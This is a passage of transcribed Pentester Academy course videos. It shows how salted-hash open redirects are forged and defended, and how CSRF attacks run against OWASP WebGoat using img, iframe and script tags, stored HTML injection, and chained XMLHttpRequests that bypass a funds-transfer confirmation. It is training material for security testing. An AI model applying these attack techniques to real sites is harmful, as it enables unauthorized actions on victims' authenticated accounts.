you have to change it in the real redirect script as well, or else it just expect something else, not just in the index.php where really it didn't even matter. So let's go back in here, put this in, hit this, SHA-512. Now let me change this to google.com. Everything was copied, hopefully. And there you go, right? Fantastic. So you can clearly see that by using the technique, it is really possible to work with different hashes. Let me change this to MD5 again. And now you're in a better position to figure out what is happening. Now keep in mind, it's always important that you are able to identify the hashing algorithm. And this is non-trivial, right? It's completely non-trivial. And the better technique always is going to be that you create scripts like hash.php for the programming language and application framework in question, and that should be the best place to start, right? Fantastic. So hopefully you enjoyed this video. If you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pen Testing course at Pentester Academy. Now in this video, we will look at a variation of how open redirects are implemented by developers, and this one uses hashing but with a cryptographic salt. So what is a cryptographic salt? Well, think of it basically as something random which is prepended or appended to the URL before hashing. Now keep in mind, even though typically a salt is chosen randomly, depending on the developer's application logic, it might be static for the entire lifetime of the application or might be rotated. At the very same time, the crypto salt itself might be part of the URL param or might not. Now all of this depends on the developer logic.
So let's take an example. Okay. So now let me actually open up index.php. This is the familiar file we've been using for the last couple of videos. Now, what we've done is we have defined a cryptographic salt whose value is ABC, right? And when we create the hash using MD5, we prepend the salt to the URL. Okay. So now if I open up the browser and the directory which we want to go to in this case is salted hashes. Right, we get the bottom part just like in the previous video. If I copy this out and let's paste it in LeafPad so we can analyze it better. There we go. Now if you notice, we basically have the hash in here and the URL. Now of course there is really no way of knowing if the hash was generated using a crypto salt. Now as I mentioned, in this case in the application this is statically defined. In many applications, a lot of times the URL might contain an additional parameter with the salt, or the salt itself might be prepended or appended along with the hash. You may even have separators between the salt and the hash just so that the application can receive it and parse it accordingly. Okay. Now, in order to work with this, of course, we would have to go ahead and create a way by which we can generate hashes using salts. So this is exactly what I've done by modifying the previous video's hash.php, which gives us the hash value for various hashing algorithms. And all I've done is now I take in an input parameter additionally, which tells me if a salt has been applied or not, and then the value of the salt. Now this is the form and this is the actual application logic. Depending on if the salt we want to try is prepended or appended, we create the final URL accordingly using the salt and the URL. And after that, for each of the hashing algorithms, we create the hash just like before. So let me actually go in here. So here is the application, simple one. Now let's say I type in http securitytube.net. Currently the salt is set to none. If I click on get hash list, so this is what we got before when no salt was used, right? And we can clearly see the value of MD5 does not match what we have, right? Of course, we are assuming we know it is MD5, might not be the case at all. Now, if the salt had been part of this URL, then we could have picked it up. Let's assume that in this case. Now I'm going to be throwing out some challenges in the web application challenges section, where I'm going to play with prepending, appending, having delimiters, etc. So try them out. This is going to be a very simple focused example. Okay. So now if I were to use securitytube.net, let's say I put in the salt ABC and I say prepended, get hash list. Now this is the MD5 value. Let me copy it out and let me paste it below for comparison. And you can clearly see that this hash value in here perfectly matches this hash value in here. Fantastic, right? Now the most important thing, of course, is to know the salt.
In an application where the salt is statically defined in the app and never changes, an attacker could try to probably do a dictionary attack with a set of salts. In applications where the salt itself might be dynamically changed, maybe every 24 hours or something like that, by picking it up from a database and modifying it accordingly, it would be exceedingly difficult for an attacker to figure it out, and hence it would offer more security. Keep in mind that the salt itself can be as long and random as possible, right? It's immaterial. So let's kind of go back here. Now let me go ahead and apply a new URL, google.com. Me prepend the salt ABC. Let's get the hash list. Here it is. Let's copy it out. And let's paste it in here. Let's go back here. Copy this out. Open a new tab. Paste it. And there we go. We've been redirected to google.com. Now, keep in mind that while playing with the salt, you might have to try all possible combinations of even appending it. So let's say if the salt was actually appended, immediately, of course, just as expected, the hash would completely differ in size. Now, as I mentioned, it is very, very possible that the salt itself is part of the URL and might be used. So as an example, I could actually go ahead and modify this application to contain the salt as well. So let's try this out. And now if you notice, the application also spits out the salt. Now, ideally, in the case of cryptography, the salt itself is always sent to the end user so that he can figure it out as well. Now, this is a very special case, of course, in which if the attacker knows the salt and the hashing algorithm, then it would be very, very simple for him to hash pretty much any URL and get the appropriate parameters, right? Which would make it very easy for him to beat this system. So in a real world application, I've actually noticed that this was the case, but the salt wasn't so blatantly obvious. Rather, the salt was prepended here or somewhere at the end, sometimes even with a delimiter, like, let's say, let's move this part here. You could have something like ABC hyphen, and the receiving application knows that everything to the left of the hyphen is basically the salt. A lot of times it's a fixed number of characters. So, the first 3 characters is always the salt. And similarly, it is possible that the application logic may even have it appended or a delimiter and appended, right? Many variations, and a lot of times as a pen tester, you might have to really play with all of these hashes and hashing algorithms and try various combinations to break application logic, right? This is going to require a bit of patience, especially in cases where things aren't too obvious, the parameter names aren't too obvious. So anyway, I hope you guys enjoyed this video. Try out the web application challenges which I will be putting out for unvalidated redirects and forwards, and you're going to see some interesting ones with respect to salts and hashing. So hope you enjoyed this video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the web application pen testing series at Pentester Academy. Now in the last couple of videos, we have looked at unvalidated open redirects and seen how under various circumstances it might be possible to go ahead and use this as an attack vector. Now in this video, let us look at some techniques with which we can secure unvalidated or open redirects. Okay, so how do we do that? Well, as everybody recommends, if you can avoid this in your application, you should. However, there are some applications which need to redirect the user to a third-party website. Now, whenever you do this, you need to be able to validate the URL you are redirecting to and ensure that this is one of the URLs you are happy to redirect to. Now, let me give you examples. If the redirect URLs are known a priori and are probably just from a given set for an application, then this is really very easy to do. The way you would do this is, rather than have the URL as an input which the user can tamper with, you would just deal with IDs which internally map to the right URL you want to redirect to. Now this ID could be an index in an array in case the number of URLs is less, or could even be a column in a database. So let me show you a simple example of how we can accomplish this. So I'm going to go inside secure. Now in index.php, what you would notice, now we have a call to redirect.php, but the only parameter being passed is id equals 1. So if I go in here, type in secure, and I copy this link out and paste it here, you'll actually find we only have id equals 1. And if we hit an enter, this redirects to securitube.net. Now if I go ahead and change this to 2, you notice it suddenly says invalid URL, right? Now let's go and look at the code for redirect.php. Now in this case, I've done a very simple implementation, and I take in the ID parameter and basically go through a set of ifs. In this case only one, but you could of course have an if, else if, and all that. And basically I say, hey, if this is 1, then I need to redirect to securitube.net. And clearly, as you can imagine, ID could actually be an index in an array where all of these URLs, or rather the allowed URLs for the application, are mapped. And if anything else is requested, any other ID, then we throw out whatever error is applicable to the application. So you can clearly see with such an implementation, the user cannot add a new URL to this list in any way and can only redirect to the predefined set of URLs which the application developer would want you to. Now, the downside, of course, is the developer would have to know the list of URLs a priori, and this might be something which might not always be possible. Maybe imagine a website where 1,000 URLs come in every day, right? Or probably even millions, like a site like Facebook where people paste links, right? Maybe Facebook goes through its own internal link checker before which it decides that this is a safe URL and anyone else clicking on this link should be allowed to redirect there, right? Which means now the list of URLs cannot be known a priori, right? So now the list of URLs are completely unknown. What do we do in this case? So let's say we receive a URL from whatever input and the site goes through some sort of analysis to decide that, well, this URL is going to be allowed to redirect to. At that point, you have a bunch of options. You can either go ahead and create a set in a database or in memcache for that given user and say this user is allowed to redirect to these URLs, or alternately, you could actually go ahead and create the redirection links with hashes as one possibility. But keep in mind that the salt used to create the hash should be something which is long, complicated, and is rotated so that there is no way for anyone else to start manufacturing their own hashes for any URL. The other option is to go ahead and encrypt the URL itself in the redirection link which you're generating. And when the user clicks on it, then you go ahead and decrypt the URL. And if the decryption is successful, you know that this was probably something you had explicitly allowed a while back, and then you redirect the user to that URL. Of course, there are many other implementations possible. These are just a couple of possibilities. So now let's look at the one in which we have a long random hash. Okay, so now if I go in here and I go to secure2, we see this link. Let me copy this out, paste this in here, and now you'll actually notice there is a hash. Now, going by the different experiments we did in the last couple of videos, you would actually find that this is not a hash which you can easily crack and understand, right? There would be no way by which you can figure out, to some extent, even the algorithm. It might be quite difficult. And even if you do figure it out, you'll actually find that this one uses a salt. And the salt isn't very simple to decipher or to break. The salt is actually quite complicated. And hence you would have no option but to give up as an attacker. So let me show you the code. Let's actually hit an enter here first. You notice we are redirected to securitybtube.net. And now let me look at the code. If I look at index.php, you notice the salt is quite complicated, literally. And the rest of the code really is what we have looked at before, which is, we take the salt, we concatenate it with the URL, and then we create basically the hash from that. Now, keep in mind that in a real world application, of course, many of these URLs may come in as input. And once your application, using whatever technique, is happy that this is a URL you would redirect to, you can go ahead and create these hashes and even store them in memory, in memcache or in other places. So if we now look at redirect.php, it's pretty much the same. We have the salt up here. We take the URL as input, we take the hash as input, and then we compare this against the hash we create using the salt and URL. And if that matches, we do the redirection, else we say invalid redirect URL. So let's say paste this, change this to a 4,
it just won't work. Now, keep in mind, of course, that in this technique, or in the one where you might choose to even employ encryption over the URL, the secrecy of the salt or the encryption key is the most important thing to go ahead and preserve the security of this mechanism. And hence it is highly recommended that you choose something which is long and complicated and keep rotating it depending on how critical the application is. Now, I haven't done the encryption demo. I really think you can do it yourself if you know a bit of PHP. If the idea is clear, then I think you pretty much have a clear understanding of how this works. So that's all I have in mind for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the Web Application Pen Testing course at Pentester Academy. Now in this video, we are going to look at an interesting new vulnerability called cross-site request forgery. Now this is popularly referred to as CSRF and sometimes as XSRF. The way people like to pronounce CSRF is CSRF. Okay. So what is CSRF? Now, in the case of a CSRF attack, it's really a malicious website which ends up exploiting the trust between the user's browser and a vulnerable website to which a user is typically authenticated to. So here is an example of how I would visualize this. Let's say we have a vulnerable website called vulnerable.com, and there are certain URLs on that website which allow us to run commands. Let's say vulnerable website is a bank and we have a URL which is for funds transfer, and when a user hits that URL with the appropriate parameters, a funds transfer happens. Now, whenever the user is logged on to the site, the cookies for the website and other session state is stored on the browser. Now, what an attacker does is he exploits this trust in the user's browser with the vulnerable website. How does he do that? The attacker typically sets up his own malicious website, and in that website he goes ahead and, let's say, creates image sources, script sources, iframes, where the source of all of these HTML tags is set to that URL on vulnerablewebsite.com, which performs the fund transfer operation. Now, when the browser opens up the malicious website, it goes through the HTML, and when it sees any of these iframes, script tags, or image tags, it just blindly goes ahead and tries to fetch it with whatever URL is mentioned in the source attribute. So when that happens, the browser also sends the cookies and all of that to the vulnerable website, which it had stored in its cache because the user is still authenticated to the vulnerable site. Now, as you can imagine, this results in unauthorized commands being run on vulnerable website on behalf of the authenticated user, even though these requests were generated because of the way the HTML page on the malicious website was. Anyway, enough of theory. Let's actually take up a real world example. Now for this demo, I'm going to be using the popular OWASP WebGoat vulnerable application. You can download it from the GitHub page. They've actually come up with a new version, which is version 6. this seems to be a major rewrite, even though all the vulnerabilities seem to be the same as the older ones. So all you have to do is download OWASP WebGoat. The link is provided. The easy run distribution is the best option. And ensure you have Java JVM installed, and then open a command prompt and just run the jar file, right? So let's go ahead and do this. So I've already downloaded the jar file. So let me open up a command prompt, change directory to the OWASP WebGoat directory, and then just do a java-jar with the name of the file, which is webgoat 601 war exec. And there we go. This is going to bring up Apache Tomcat. Give it a second while everything gets loaded. As you can already notice, because it's a war file, it's actually a package, and we see a .extract directory in here where all of these files are being created, web app, webgoat, and now you can see all of these lessons plans and whatnot, right? So basically this self-extracting war file is probably the best way to get started. As you can see, it was very simple, provided Java is already installed. Okay, so now what we're going to do is, if you go back to the documentation, actually find all we need to do is go to this URL. Let's go back in here, paste this URL, and there we go. We are on the local webgoat site. Now it gives us two users. One is guest, the other is webgoat, username, password. I've already entered guest. Let's just click sign in. And this will take you to the actual webgoat application. Now, if you've never used webgoat before, the left-hand column is what mentions the different exercises, typically arranged by the vulnerability name as the category. Let's click on XSS, scroll down, and then hit cross-site request forgery. Fantastic. Now, you can actually see that the cookie is actually displayed here on the right, just so you know you have a cookie. There are other ways by which you can do this as well, and which you can try out later on. Okay, so let's take up an example of a CSRF vulnerability. Now, we have a very simple news group application here. So we can put in messages. It's great to meet all of you. And you can submit, and if you notice, it appears in the message list down below. Click on it and you can see the actual message. Fantastic. Now what we actually have to do is, your goal is to send an email to a news group that contains an image whose URL is pointing to a malicious request, right? The URL should point to the CSRF lesson with an extra parameter, transfer funds equals 4,000. Okay, so this would really be the URL which we would want to hit. Now let's actually look at what the URL is. So I'm going to go ahead here, click on tools, and then click on network, just so that I can get the URL a little bit easily. And I'm going to click on CSRF. There we go. And a little bit of playing around would actually tell you that this is the URL in question, right? Webgoat attack screen 33 blah blah blah. An easy way is really just to click edit and resend so that we can copy this out. Then you can close this. Okay, so now from an attacker's perspective, let's actually create the vulnerable, or rather the malicious HTML file. So I'm going to go ahead, create demo.html. Open it up. Right. Let's actually rename this to attack. Now let me type in an HTML file real quick in here. Okay, now keep in mind that this attack.html is created by an attacker. And as an example, what he's going to do in here is create an image tag, source is equals, and then paste this as the source. Keep in mind that the challenge requires us to pass an additional parameter called transfer funds 4000, right? So I'm going to copy this out, add in an ampersand so that I can squeeze in another parameter, and then let's close this tag. Now they want it also to be a 1x1 image, so I'm just going to really quickly go ahead and do width is equals 1, height equals 1. There we go. Right? So what would happen when this page actually loads? Right? Keep in mind that this is going to be hosted on a malicious website, typically on a malicious website controlled by the attacker. So now when the victim loads this up, the assumption is the victim is still logged into localhost 8080, right? He's logged into this web application. He still has his cookies and all of that in the browser cache. And if that assumption is true, which is typically the case in today's web applications, where users pretty much stay logged in perpetually, right? Like Gmail, Facebook, and all of these sites where the timeout is pretty much very, very high. So assuming the user is still logged into this host, what would happen is the browser would make a request for localhost 8080 webgoat attack screen equal 33 blah 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 ampersand transfer funds equals 4000. Now when this reaches the victim website, which is the webgoat website here, the website has no way to differentiate if the user had initiated this transaction from this site itself or through a malicious site, because there seem to be no other parameters the application can use to decipher that. Now when this happens, the application happily accepts and does this operation provided that the cookie contains whatever session state is required to authenticate that user. So let me go ahead and run this. Let's open it up in a new tab. So I'm going to go here, open this up in Firefox. Keep in mind that we continue to be logged into the vulnerable app. So here we go. Nothing seems to happen. But if I refresh this page and go back here, you'd actually notice a little tick against CSRF, right? Fantastic. So this actually shows that the attack succeeded. Now keep in mind that the most common case is when the attacker is going to lure the victim to his malicious website where this ends up running. However, there can be cases where the attacker can inject into the original website itself. So let's actually assume, let's not assume, let's actually check if this website is vulnerable to some sort of HTML injection attack. Am I vulnerable to HTML injection? Submit this. Let's go down here. Let's click on hi. And if you notice, am I vulnerable to HTML injection is all in bold, which proves HTML injection is possible here. Fantastic. Let's restart the lesson. Once we do that, let's refresh the page real quick.
for some reason the restart doesn't seem to be working. Give me a second, I'll just restart. Okay, the lesson was restarted. Now we figured out that there is an HTML injection here, which actually means we can put in the CSRF payload directly into this page. The way we do that is I'm just going to copy out this little instruction in here into the page. Gonna hit submit. Now, of course, the assumption at this point, if I just refresh the page, right, you would actually notice that we still haven't successfully completed the CSRF attack, simply because the logged in user still has not viewed this page. For some reason, me refreshing it seems to have removed it. So let me actually go ahead and add the CSRF payload once again. Okay. So now let's go ahead and click on this. Now let's assume we are a regular user who clicks on this. If you notice, we can't see any message, but now if I refresh the page, go back in here, you would notice that this ends up happening, right? Now let me show you how this worked again. And this time around, let's go ahead and monitor the network. So when I end up opening up this message, right, you automatically see that there seems to be a GET request in here. Let's go back to network. Here it is. And the GET request is actually for screen 33 transfer funds equals 4,000. So the request only goes through when an authenticated user is going to view this page where the attacker has injected his malicious CSRF payload, right? Fantastic. So what we found is, in the most basic invocation of CSRF attacks, there are two possibilities. Possibility one is the attacker lures the victim to his website, and assuming the victim is still authenticated, the operation goes through because of the trust between the browser and the victim site. The other possibility is that the victim site itself is vulnerable to other attacks like HTML injection and even XSS, as we will see in a later example. Now, in this case, as this was vulnerable to an HTML injection attack, the attacker, who's also user of the same forum, injects his CSRF payload, and now any user of the same forum, when he views the attacker payload post, then a call to basically the operation on the system is made. In this case, webgoat attack, and the whole transfer funds equals 4,000. And when the victim website now receives this request, as it has no way to differentiate if this request was user initiated or automated in some way, it goes ahead, it goes ahead, allows the operation to go through, and hence the attacker is able to run unauthorized operations or commands on the victim server. Fantastic. So hope you guys enjoyed this introduction video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead. Hello all, welcome to the web application pentesting course at Pentester Academy. Now in this video, I'd like to introduce you to the different HTML tags which can be used to trigger CSRF attacks. Now in the last demonstration with webgoat, you've already seen that the image tag can be used. Let's actually do the demo with a couple of other tags. So I'm going to start my webgoat instance. right? If you aren't sure how I downloaded WebGoat and etc. from, please refer to the last video, which has all the details. So now that WebGoat is started, let's actually access it. So here is the login page, and I'm going to go with guest, sign in. And let's actually go to the last CSRF example, which is cross-site request forgery, right? Now, the requirement, as you recall, was to go ahead and add an extra parameter, transfer funds. So let's quickly get the URL, hit developer tools, go to network, minimize this a little bit, click on this. Let's go up. Here is the URL. I can just copy the URL from in here. Fantastic. Let me paste it in a notepad instance. Okay. So in the last video, we saw the image tag, right? One of the other popular tags is the iframe tag. Again, you can mention the source in here, right? There are a lot of other parameters which can go in depending on what we want to accomplish, right? In some cases, you know, if not all, you want the iframe to be hidden, not be viewable. Now, I'll be putting out a lot of web application challenges, I think around 10 or 12 of them at least, on CSRF, which is going to cover many of these variations, right? In the theory videos, I'd just like to cover this conceptually. So let me copy this out. Let's go back to the app, and I'm going to call this the iframe demo. Right, I'm going to paste my little iframe in here, add the extra ampersand transfer funds equals 4,000. Hit a submit. I see the message appear in here. We actually verify that the request actually goes through before we view it. Let's scroll down. Now I'm going to click on the message list and click on iframe demo. When the message opens up, of course, the first request is fetching the message, and then we should actually see the transfer funds go through if all works well. There we go. And if I go ahead and look at the first one, you'd actually see this is really fetching the message. You can click on preview and probably see the message getting fetched in here, right? And basically what you would actually find is this is the real URL, ampersand transfer funds equals 4,000, which is triggered using the iframe, right? Fantastic. I'm going to be putting out a couple of interesting challenges which might have variations of the iframe technique. So keep looking at the web application challenges section. Now, apart from this, if you click on this, the CSRF demo is done, but let me reset it. Apart from this, one of the other tags which can be used is the script tag. So we could go back in here and let's say script tag, right? And then we can go to our little notepad, copy this out, paste this, change this to script tag, add the ampersand transfer funds equals 4,000. Copy this out. Paste it in here. So now we have the script tag demo. Let me go back again to my network param monitoring. And now let me click on the script tag message. Again, we see two of them go through. The first, of course, is going to be the fetching of the message. And the second one is basically fetching transfer funds equals 4,000. Something else was probably added in by the browser. Now, if you go back in here, refresh this page, go down below, click on script tags. Again, find that the CSRF challenge is successfully been completed. So if you look at it, pretty much any tag which allows you to fetch something from the remote server by the specification of a source parameter in it is going to go ahead and help you trigger a CSRF attack. Now, what are the other possibilities? The other possibility includes using XML HTTP requests. Now, these have two variations. The first is when you found some sort of an injection vulnerability on the victim site, right? Such as an HTML injection vulnerability, an XSS, which could be reflected or stored, right, etc. The other possibility is using XML HTTP requests to load from the attacker's website if there is a favorable CORS or a cross-origin policy, right? Now, I'm going to be taking up CORS in way more detail much later in these videos. So I don't want to go ahead and disrupt the flow. Let's keep it simple for the time being. And in this case, I'm going to assume an HTML injection vulnerability, which allows me to inject script tags as well. So now let me use an XML HTTP request. Now keep in mind that the last three tags would work perfectly even from the attacker's website, right? And typically these tags allow you only to send a GET request, while an XML HTTP request allows you to send other methods as well, such as GET, POST, PUT, etc. Right? Most of the methods are allowed. There are some restrictions, and I would recommend you look at the JavaScript for Pentesters course to learn more about XML HTTP requests and how they can be used successfully to go ahead and do client-side exploitation. Okay, so now let me create an XML HTTP request for the same. And again, if this isn't clear to you, please look at the JavaScript for Pentesters course. So I'm going to say request equals new XML HTTP request. And then we have request.open. The method is the first option, which would be get, then the URL, and then if we want it to be synchronous or asynchronous. Most of the time, you're only going to go with asynchronous. Now, actually copy this out. This be the URL. I'm going to copy out this entire tag in here. Let's go back to the vulnerable application. Let's restart the lesson. Let's verify the lesson has been restarted or hasn't. Let's restart the lesson. Let's verify it real quick. The lesson is restarted now. Okay. And now I'm going to do the XML HTTP request demo. And in this case, now I put in an actual JavaScript code within a script tag, right? Hit submit. Let's hit XML HTTP request demo. Before that, let's open up our network monitor. There we go. So
So the first request, of course, was for the message. The second one is really our XML HTTP request going back, right? And if we look at the response, which of course we aren't doing anything with right now on the page, we see that transfer funds has been successfully completed. Fantastic. Now in this case, we went ahead and injected the XML HTTP request because a vulnerability existed. Now let's see what happens if we try to load the same page up through an attacker controlled website, right? So I'm going to remove and click restart lesson again. And let's create an HTML page in here. Let's call this attacker.html. Quickly going to go ahead and put this in here. Paste the script tag. Open this up now in Firefox. Page opened. We'd ideally like to monitor the network. So let me quickly do a refresh of this. Go back in here, ensure the lesson is restarted. Let's go in here. Click on this, click on network, refresh the page, and I've hit this, right? And you actually notice that nothing seems to have apparently happened. We basically just seem to get like a location HTTP header which tells us where this is, probably pushing us towards a login.mvc, something or the other, right? Now I'm leaving this as a little teaser for you guys to investigate further when we are going to talk about XML HTTP requests, cores, and all of that. We'll be discussing this in more detail. Great. So the real conclusion is that there are multiple tags and other techniques which can be used to trigger CSRF attacks. And we've discussed a couple of them, right? Fantastic. So hopefully you've enjoyed this video, and please do try out these variations using WebGoat and other vulnerable software out there. That's all for this video. If you're enjoying your time at Pentester Academy, please recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we are going to look at CSRF multi-step operation handling. Now what do I mean by that? Now on most critical websites, important operations might span multiple steps. So as an example, when you're transferring funds from one account to the other and you click submit, the bank might show you a confirmation screen in between, which you have to accept before the real transaction goes through. Now for a pen tester, this can be a real pain, because what this means is he can't just go ahead, set up his little image source equals or iframe or script as we saw in the last video and just get the operation done. He would have to simulate the same multi-step operation, which is probably going to be done by an real user on the system. Now keep in mind that the one we are going to discuss, right, in this case is where no CSRF protection is enabled, simply because if, let's say, you have CSRF tokens, the attacker might not be very easily able to figure out how to create the multi-step operation, right? Now we will take up multi-step operations with CSRF protection enabled, like tokens and a host of other things in later videos, right? Expect just the CSRF theory videos to be at least 7 to 10. So we'll take it up a little later. I don't want to complicate things early on. Okay, so let's actually do the demo before we talk about, complicated multi-step operations with tokens. So in this case, there are no tokens, and I'm going to be using the WebGoat application I used in the last demo, and the one we are going to use this time is the CSRF prompt bypass. Now this is similar to the last demo. Let's actually go ahead and understand this a little better. So let me first figure out the URL for some odd reason. The WebGoat guys would always like to make that a challenge as well. So I've clicked on this. Right, the other option of course is look at the source, but I'm not in the mood to do that. So here is the actual operation. So let me copy this one out. And let me actually paste this in here. Right. And I'm going to be adding the ampersand transfer funds as well, just as requested in the challenge. And I'm going to click and enter. And if you notice, I'm taken to a confirmation page, right? Let me actually note down all of these links because this is going to be handy. So this is the first link I need to hit, transfer funds equals 4,000. And this leads to the confirmation page, right? And if I look at the confirmation page source, I have a little form in here. Let me actually copy this form out so that I can see the parameters. Here it is. So here is basically the form of interest to us, right? And if you notice in here, the method seems to be a post. So we can actually verify many of those things in here just by clicking on network and then clicking confirm, right? So if you notice, basically we are sending out a post request and it basically now tells us the fund transfer is complete. So if I actually click on this, hit and send, right? So edit and send, we can actually see a lot of interesting things happening in here. Just give me a second. Should go back in here, hit a confirm, hit this, look at the parameters of the post request, and if you notice, the URL with screen 32 and menu 900 pretty much is the same. The only difference right now is the fact that this is now a post request, right? So what we have to do is make a post request. So let's remove this. Now we don't need this anymore. So this is going to be step 1 of the operation, which is hitting this URL, and this is going to be step 2 of the operation, right? The confirmation page. And in the confirmation page, what we would now need to go ahead and send is basically going to be form data transfer funds confirm. So I'm going to do a transfer funds and the value for this needs to be confirm. Fantastic. Okay, so now let's go ahead and set this up. right? The technique I'm going to use is the XML HTTP request. So let's jump right in. So I'm going to use my script tag. And the first thing I'm going to do is var, let's call this request1 equals new XML HTTP request. And then I'm going to do a request1 dot open. First is basically the request for this URL, and this seems to be an ordinary GET operation, right? Nothing great about it. And let's make this asynchronous. Then we can do a request1 dot send. Now, basically, what I would want is that once this request goes through and comes back, then I can make the post request to this URL. So let me introduce on ready state change handler. Now keep in mind that if you don't recall what this is or have no clue, look at the JavaScript for Pentesters course, right? On Pentester Academy, of course. On ready state change. We're going to mention the function responsible for taking care of this. Now inside this, of course, we'd like to make sure that the response has arrived and everything is okay. So I'm going to do the if request1 dot ready state equals 4, data has arrived with us, and request1 dot status equals the whole 200 okay thing. That's when we are going to now go ahead and make the second XML HTTP request, right? And this one would have to be a post request. So I'm going to do a request2 equals new XML HTTP request, and then request2 dot open. In this case, keep in mind this is a post request. The URL, let's make this asynchronous as well, and this URL is actually going to be this one in here. Now it's a post request, and if you recall, there are parameters we need to send, right? The parameter which is basically the form data now is going to be transfer funds, which basically equals confirm. So in the case of post, if you recall, we need to set the appropriate headers in this XML HTTP request. So I'm going to do a request2.set request header, and the header of course is going to be content type, and then basically we mention the content type. Now content type is going to be application / xwww form URL encoded. Now we can actually send the request out, and the way we would do that is ensure that the form data is inside the send call. So I'm going to do basically a transfer funds equals confirm. Okay, looks about okay. Let me just quickly look at this, ensure there are no typos. Request1 new XML HTTP request, request1 dot on ready state change state. Seems about okay to me. I'm just going to copy this one out. Go back in here. Let's go back to the original application.
I'm sure the task would show as done. So I need to probably restart the lesson again, just to ensure the task isn't done. Okay, prompt bypass, it seems okay. Now let me actually do the XML HTTP request demo bypass. Let's do a bypass demo. We paste the JavaScript in here. Clearly see the JavaScript which I pasted, which we've just created right now. And let me hit submit in here. This appears in the list of messages. Now let's actually see what really happens by going ahead and monitoring the network as we've done before. Now let me click on this message to open it up. And there you go. The first click, of course, is the message opening up. The second click is basically the get request which went through. If you notice, we get a 200 OK. And if we see the response preview, you would actually notice the confirmation screen appears. And the last one, if you notice, is a post method with the params transfer funds equals confirm being sent. And this results in the transfer of funds being completed. Fantastic. And if we refresh this, actually find we are done. Awesome. Now, one of the other things I'd like to discuss is the official solutions from WebGoat's side, right? So if I click on their solutions, let's look at what they've done. So they've offered two solutions. One is using the image tag and the other is iframe. Now, I think I'm on the wrong lesson. Hold on. Here we go. Now what they've actually done in this case with the iframe is basically the source of the first iframe. So let me actually copy this out and explain what they've done. And you'll actually see something funny in there, which so let me copy this out. Let me copy this entire code out really. Okay. So this is the solution where they've defined two iframes. The first iframe loads up and then loads the content of the second iframe, right? So the first one is called myFrame, and what it does is it loads up the first operation, which is transfer funds equals 400, which itself is kind of wrong. It's 4,000. And then after that, what it does is on load, which is as soon as the iframe loads, we call document.getElement by ID frame2 and set the source to the next operation, which basically is the funds transfer equals confirm. And this basically gets loaded in here. Now, the first problem which I actually noticed is with this, you can do a get and a get. We aren't doing a post in here at all. The case is that seems like the script to which we are posting this is okay with getting a get instead of a post if the same parameters are passed in. So what I can actually do is if I copy this out and I go back in here, I do iframe get. The reason I'm mentioning that very specifically is you're going to see that. So I'm going to go ahead, click a submit. This appears here. Let me look at the network monitor. Let's go down in here. Let me click on the iframe get demo. Now, if you notice, the first one is of course getting it.
And I think one of the other mistakes these guys have done is in the solution, they have a different challenge actually referenced. Let me just refresh the page real quick. Hold on. Okay. So the mistake really is the screen isn't 5. The screen is 32 and the menu is 900, right? So the screen is 32. Menu 900 seems to be okay in both places. Let me copy this out. I apologize. And I'm going to do an iframe get demo. Click submit. See that in there. It's the last one in here. Let's set up the network monitor. Click on the message. And there we go. First one is of course fetching the message. The second one is the transfer message but with a get. And the third one is the transfer funds with a confirm. Again, a get method. Now interestingly, looks like because the script seems to accept both get and posts, which might not always be the case. Keep in mind, right? A developer could have coded in such a way that the form post only accepts a post and is not going to accept it in the form of a get. Then this technique would currently fail. I'm not sure why they have this little mistake in here of using a get when the original lesson actually had a get post. Anyway, so let me click and restart this lesson again. But this is a good technique nonetheless. As I said, we touched upon iframe. The key thing here is loading the second iframe using the onload event handler, right? This is something we've discussed a lot when we did XSS attacks, right? Of how onload can be abused. Now, the second one is basically using the image tag. Again, they seem to have done a get rather than a get post, because you really can't do a get post with the image tag one. So let me actually copy this out, paste it in here. So I'm going to call this the image technique for successive gets, right? Again, the URLs are completely off mark. 32, menu is 900, transfer funds is 4000. Looks like maybe the values don't make a difference to these demo scripts, but I just want to be correct. There you go. So what they do here is image source equals, and this is the first operation, right? And of course, this operation, which is when the browser fetches this image, it won't find any image data and would raise an error. When that happens, the onError handler is going to be called. And all that does is really what happened in the case of the iframe, which is now it says document.getElement by ID image2, and then loads.source equals blah, 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 which includes now the transfer funds equals confirm, right? And that gets loaded up in here. Now, as you can see, if it was just gets, you could actually have image2 have an onError as well, which would load image3 and then image4 and then image5. And if it was just gets where you already know the URL, there is no form of token or anything in there, then you could call as many multi-step operations successively as possible using the image technique and the iframe technique, right? The best part of the image and iframe is it can be embedded happily on an attacker controlled website. Now, if you wanted to do a get and a post, that can also be done through an attacker's website, but I would be leaving that in one of the challenges which we are going to create with the CSRF videos, which you should be able to find under web application challenges section shortly after the release of this video. Anyway, let's actually run this example as well for the sake of completion. And I'm going to say the image, again, the get technique, right? Because this isn't doing a get post. Okay, if all the parameters were correct, let me just kind of verify that once again. 32 and 900. There's no other typos or anything anywhere else. Then I could do quick submit. The image stuff appears in there. Let's click network. Just click on this. Right, and there you go. You actually see the image get. Okay, looks like the URL was off mark, right? This seemed to be an attack which was missing. My bad. So I actually had a new parameter in here. How stupid of me. I didn't even see the damn URLs. So I apologize for not seeing that and swearing about it. I think the web code guys really need someone to proofread the solutions. I think it's a fantastic application, but it needs to be proofread very, very well. Okay. I think this should be it. So I'm going to go back in here and say image get final, hopefully. And then hit submit. This image shows up in here. And clear the bottom in here. I'm going to click this. And there you go. The first one is fetching of the message. The second one is the transfer funds equals 4,000. Now the thing is that if you click on preview, you won't see anything, simply because we are doing this as part of the image tag, and hence the response data has no meaning at this point, because from the browser's perspective, basically is corrupt data. Unlike an iframe where the response expected was really HTML. Now here is the other operation, transfer funds equals confirm, again a get. Keep that in mind, right? We can't do a post with this technique. And now if you go ahead and click on this, go down there, you still don't see a prompt based bypass. Interesting. Let me just quickly check this. There we go. So here is the first one, transfer funds equals 4,000. Here's this. I seem to have mentioned both of these parameters. Too many mistakes on this one, guys. I apologize. Okay. Final image get. Submit, clear this up. There we go. First one, transfer funds is 4,000. Second one, transfer funds is confirm. Now let's go back in here. Let's refresh this page. Scroll down and there you go. We've gone ahead and successfully completed this challenge, right? So 